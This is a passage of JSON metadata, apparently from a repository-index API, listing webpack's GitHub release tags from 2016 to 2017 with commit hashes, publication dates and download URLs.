g/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25: